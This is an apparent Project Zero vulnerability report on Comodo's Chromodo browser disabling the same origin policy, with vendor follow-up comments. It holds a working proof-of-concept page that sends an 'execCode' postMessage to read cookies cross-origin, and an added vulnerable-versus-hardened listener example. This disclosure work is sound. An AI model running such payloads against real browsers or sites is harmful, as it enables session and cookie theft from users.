Status: Fixed
Closed: Feb 2016

Blocking:
issue 713

Comodo: Comodo "Chromodo" browser disables same origin policy, effectively turning off web security.
Project Member Reported by taviso@google.com, Jan 22 2016
When you install Comodo Internet Security, by default a new browser called Chromodo is installed and set as the default browser. Additionally, all shortcuts are replaced with Chromodo links and all settings, cookies, etc. are imported from Chrome. They also hijack DNS settings, among other shady practices.

https://www.comodo.com/home/browsers-toolbars/chromodo-private-internet-browser.php

Chromodo is described as "highest levels of speed, security and privacy", but actually disables all web security. Let me repeat that, they ***disable the same origin policy***.... ?!?..

To reproduce, do something like this:

<html>
<head></head>
<body>
<script>
// Chromodo accepts a privileged "execCode" command over postMessage (the API
// named in Comment 5). Any page holding a window reference can post it to a
// cross-origin window, so the code runs with that window's document.
function steal_cookie(obj)
{
    // Wait for the opened page to load before posting the command
    setTimeout(function() {
        obj.postMessage(JSON.stringify({
            command: "execCode",
            code:    "alert(document.cookie)",
        }), "*");
    }, 2000);
}
</script>
<a href="javascript:steal_cookie(window.open('https://ssl.comodo.com/'))">Click Here</a>
</body>
</html>


This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.

 
Attachment: Windows 7 x86-2016-01-21-16-48-44.png (258 KB)
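The PoC above drives a postMessage listener that runs caller-supplied code in whatever window receives it. The following is an added example, not Comodo's code and not part of the report: a minimal Node-runnable model of such an "execCode" listener next to a hardened listener, so the two properties that matter (no origin check, and a command that evaluates arbitrary code) are visible side by side. The handler shape, the trusted origin name, the constructed victim document and the use of Function() for execution are all assumptions made for illustration.

```javascript
// Added example, not Comodo's code: a model of a postMessage "execCode"
// listener of the kind the PoC above drives, beside a hardened listener.
// Handler shape, origin names, victim document and the use of Function()
// are assumptions made for illustration.
"use strict";

// Constructed stand-in for the cross-origin victim page (e.g. the window the
// PoC opens on a different origin).
const victimDocument = { cookie: "session=abc123", title: "Victim page" };

// Runs caller-supplied code with the victim's document in scope. This models
// a listener that hands the payload to eval()/Function in the page's context.
function executeInVictim(code) {
  return new Function("document", `return (${code});`)(victimDocument);
}

// VULNERABLE: event.origin is never checked and the command executes
// arbitrary code. Since the PoC posts with a "*" target origin, any page that
// holds a window reference can drive this, which is what defeats the same
// origin policy.
function vulnerableOnMessage(event) {
  let msg;
  try { msg = JSON.parse(event.data); } catch (e) { return null; }
  if (msg && msg.command === "execCode") {
    return executeInVictim(msg.code);
  }
  return null;
}

// HARDENED: only one fixed trusted origin may talk to the listener, commands
// are dispatched from a closed table, and no command evaluates caller-supplied
// code. Removing a single command name (the fix Comment 5 describes as
// incorrect) is not a substitute for these checks.
const TRUSTED_ORIGIN = "https://trusted-extension.example"; // assumed name
const COMMANDS = new Map([
  ["getTitle", () => victimDocument.title],
]);

function hardenedOnMessage(event) {
  if (event.origin !== TRUSTED_ORIGIN) return null; // set by the browser, not spoofable
  let msg;
  try { msg = JSON.parse(event.data); } catch (e) { return null; }
  const handler = msg && COMMANDS.get(msg.command);
  return handler ? handler(msg) : null;
}

// Simulates the MessageEvent a page at `origin` delivers when it posts the
// same JSON the PoC sends.
function driveExecCode(handler, origin, code) {
  const event = { origin, data: JSON.stringify({ command: "execCode", code }) };
  return handler(event);
}

function driveCommand(handler, origin, command) {
  return handler({ origin, data: JSON.stringify({ command }) });
}

// Stand-alone demonstration.
console.log("vulnerable, attacker origin:",
  driveExecCode(vulnerableOnMessage, "https://attacker.example", "document.cookie"));
console.log("hardened, attacker origin:",
  driveExecCode(hardenedOnMessage, "https://attacker.example", "document.cookie"));
console.log("hardened, trusted getTitle:",
  driveCommand(hardenedOnMessage, TRUSTED_ORIGIN, "getTitle"));
```

In a real browser the quick sanity check for the same origin policy itself is simpler than any of this: from a page on one origin, `window.open('https://example.org').document` must throw a SecurityError once the popup has loaded. If it returns a document, cross-origin access is not being enforced.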
Project Member Comment 1 by taviso@google.com, Jan 25 2016
I've attached a working exploit for this issue. I haven't received an acknowledgement or response from Comodo, so I sent this reply:

FYI, I still haven't got a response. The same origin policy is basically disabled for all of your customers, which means there is no security on the web....this is about as bad as it gets. If the impact isn't clear to you, please let me know.

This vulnerability is bad enough to start paging people.

Attachment: exploit.html (1.3 KB)
Project Member Comment 2 by taviso@google.com, Jan 29 2016
Comodo replied that they're planning a hotfix for this issue within a day, but the other open issues may take weeks to fix.

I replied that I noticed their scan process is not using ASLR, which probably isn't a good sign going forward, and I'm planning to start a more thorough audit next week.
Comment 3 Deleted
Comment 4 Deleted
Project Member Comment 5 by taviso@google.com, Feb 2 2016
Labels: -Restrict-View-Commit
Status: Fixed
It looks like Comodo pushed a change that removes the "execCode" API that I was using in my exploit. 

This is obviously an incorrect fix, and a trivial change makes the vulnerability still exploitable. After "discussion" with Comodo (I can't really get any response from them, but I'm trying), I'll consider this bug fixed and file a new bug with the trivial bypass of their fix as a new issue.

The deleted comments above contained discussion about the bypass, I'll move them into a new issue.
Project Member Comment 6 by taviso@google.com, Feb 2 2016
Discussion about the incorrect fix is in issue 713.
Project Member Comment 7 by taviso@google.com, Feb 2 2016
Blocking: google-security-research:713
"After "discussion" with Comodo (I can't really get any response from them, but I'm trying)"

Hopefully this being posted on HackerNews will help. If not, rampant exploitation of Comodo browsers ought to incentivize companies to cancel their subscriptions and Comodo will lose money.
Comment 9 by l33t...@gmail.com, Feb 2 2016
toppest of keks, my friend.

There's plenty of evidence of the shadiness of Chromodo, it gets pushed via the kind of PUP bundler networks that also push winlocker trojans of Indian origin.
Project Member Comment 10 by taviso@google.com, Feb 2 2016
Labels: Restrict-AddIssueComment-Commit